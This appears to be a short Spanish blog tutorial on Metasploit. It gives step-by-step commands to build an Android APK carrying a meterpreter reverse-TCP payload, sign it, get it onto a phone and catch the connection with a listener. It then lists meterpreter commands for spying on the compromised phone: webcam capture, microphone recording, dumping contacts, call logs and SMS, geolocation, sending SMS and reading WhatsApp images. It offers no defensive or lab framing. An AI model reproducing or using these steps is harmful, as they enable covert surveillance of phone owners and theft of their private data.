Metasploit

TUTORIAL METASPLOIT FRAMEWORK

1. Creamos el archivo APK con la funcion de conexion inversa
# msfvenom -p android/meterpreter/reverse_tcp LHOST=http://ejemplo.com LPORT=123 R > /home/app.apk

# msf> use android/meterpreter/reverse_tcp
# msf payload(reverse_tcp) > set LHOST ejemplo.com
# LHOST => ejemplo.com
# msf payload(reverse_tcp) > set LPORT 123
# LPORT => 123
# msf payload(reverse_tcp) > generate -t raw -f /home/app.apk

2. Colocamos el programa SigApk descomprimido en la carpeta /home/ y una aplicacion
firmada, puede ser app.apk

3. Firmamos el archivo creado para que el android lo permita instalar
# java –jar /home/signapk.jar /home/certificate.pem /home/key.pk8 app.apk app2.apk

4. Si elegimos no firmarlo no pasa nada. Subimos el archivo a un servidor web y
lo descargamos en el telefono desde la web.

5. Abrimos la consola y ejecutamos msfconsole (ejecutar con privilegios de root)
# sudo msfconsole
# msf > use exploit/multi/handler
# msf > set payload android/meterpreter/reverse_tcp
# msf > set lhost 192.168.0.106 (nuestra IP)
# msf > set lport 443
# msf > exploit
# msf exploit(handler) > exploit


COMANDOS METERPRETER

meterpreter > pwd — Ubicacion actual directorio
meterpreter > cd cache — Cache
meterpreter > cat — Para ver archivos
meterpreter > ls — Listar archivos
meterpreter > upload <archivo> — Subir archivo
meterpreter > download <archivo> — Descargar archivo
meterpreter > ifconfig — Detalle configuracion redes
meterpreter > ps — Lista procesos
meterpreter > sysinfo — Informacion de sistema
meterpreter > webcam_list — Listado de webcam
meterpreter > webcam_snap -i 2 — Capturar imagen de camara 2
meterpreter > webcam_stream -l 2 — Streaming video de camara 2
meterpreter > record_mic -d 20 — Grabar 20s de audio
meterpreter > dump_calllog — Obtener registro de llamadas
meterpreter > dump_contacts — Obtener registro de contactos
meterpreter > geolocate — Obtener ubicacion del telefono
meterpreter > send_sms -d <num> -t text — Enviar SMS (deja huellas)
meterpreter > dump_sms — Ver los sms recibidos
meterpreter > route_list — Ruteo de direcciones
meterpreter > cd /sdcard — Lista archivos de SD Card
meterpreter > rm <archivo> — Eliminar archivo
meterpreter > rmdir <carpeta> — Eliminar carpeta
meterpreter > mkdir <dir> — Crear carpeta
meterpreter > search -f *.mp3 — Buscar archivos extension mp3
meterpreter > set_audio_mode -m 0 — 0:Silencio 1:Medio 2:Maximo
meterpreter > shell — Ejecutar una shell
> cd /sdcard
> cd WhatsApp\ Images
> exit — Finaliza la shell

Una respuesta a “Metasploit”

Dejar un comentario